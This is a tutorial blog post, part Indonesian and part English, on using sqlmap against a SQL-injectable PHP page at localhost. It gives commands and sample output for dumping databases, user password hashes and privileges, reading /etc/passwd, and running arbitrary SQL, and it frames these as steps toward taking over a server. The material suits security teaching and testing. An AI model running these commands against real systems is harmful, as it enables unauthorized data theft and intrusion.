SQLMap: Contoh cara remote hack database
Misalnya, kita memperoleh URL yang vulnerable adalah,
http://localhost/weak.php?id=10
dimana parameter id tidak escape secara benar di code php dan vulner sql injection. Perintah untuk me-list semua database yang ada di server tersebut adalah,
$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
Kemudian gunakan opsi -T --columns dan --dump untuk melihat table yang ada di sebuah database, kolom dari tabel, data yang ada di tabel dan seterusnya.
Fingerprinting remote system dan database-nya
Untuk melihat informasi lebih lanjut tentang database yang ada di sistem remote, kita dapat menggunakan opsi "-b". Ini akan berusaha untuk meng-ekstrak banner dari server database. Jika kita coba terhadap database mysql, akan tampak sebagai berikut,
$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b
..... [11:19:51] [INFO] the back-end DBMS is MySQL [11:19:51] [INFO] fetching banner [11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:19:51] [INFO] retrieved: 5.1.61 web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0.11 banner: '5.1.61'
Output dari banner text adalah "5.1.61". Ini adalah mysql banner dan tampak jelas terlihat dari versi mysql yang digunakan. Selanjutnya, kita dapat mencari di Google vulnerability yang mungkin ada untuk versi mysql tersebut.
Perintah selanjutnya, mengambil daftar user dan role / fungsinya, menggunakan perintah berikut,
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
..........
database management system users [5]:
[*] @'localhost'
[*] @'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
.............
database management system users password hashes:
[*] [1]:
password hash: NULL
[*] root [2]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
password hash: NULL
........
[*] %root% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
Selanjutnya, untuk memperoleh user yang digunakan saat ini, database yang digunakan saat ini maupun informasi hostname, kita dapat menggunakan perintah,
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10
........ [11:32:33] [INFO] the back-end DBMS is MySQL web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0.11 [11:32:33] [INFO] fetching current user [11:32:33] [INFO] retrieving the length of query output [11:32:33] [INFO] retrieved: 14 [11:32:38] [INFO] retrieved: root@localhost current user: 'root@localhost' [11:32:38] [INFO] fetching current database [11:32:38] [INFO] retrieving the length of query output [11:32:38] [INFO] retrieved: 5 [11:32:40] [INFO] resumed: profile_data current database: 'profile_data' [11:32:40] [INFO] fetching server hostname [11:32:40] [INFO] retrieving the length of query output [11:32:40] [INFO] retrieved: 21 [11:32:48] [INFO] retrieved: localhost.localdomain hostname: 'localhost.localdomain' [11:32:48] [INFO] testing if current user is DBA [11:32:48] [INFO] fetching current user current user is DBA: False
Di keluaran di atas, kita dapat melihat dengan jelas user yang digunakan saat ini, database yang digunakan saat ini maupun informasi hostname.
Reading a system file
On mysql if the database user has permission to the FILE operation, then it can read files from the file system. It can read only those files that are publicly readable or readable by the mysql user. Here is a quick example to read the /etc/passwd file.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
sqlmap will store the file in its directory on the local file system, so that it can be read later.
Run arbitrary sql command
The sql-query option can be used to run arbitrary sql queries on the database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"
........... [11:50:22] [INFO] retrieved: 2013-04-15 11:51:10 select now();: '2013-04-15 11:51:10'
The last line in the output is the sql query output which was run on the remote database.
Conclusion
So with all the above information it gets easier to get further into the system and eventually take control of it, if possible. Sqlmap does quite a massive task by discovering the database, the data and details about the operating system. But in most cases it might not able to fully provide control of the remote system in the form of a shell.
Further techniques need to be employed to get greater control of the system and eventually root. We shall be discussing those in upcoming tutorials.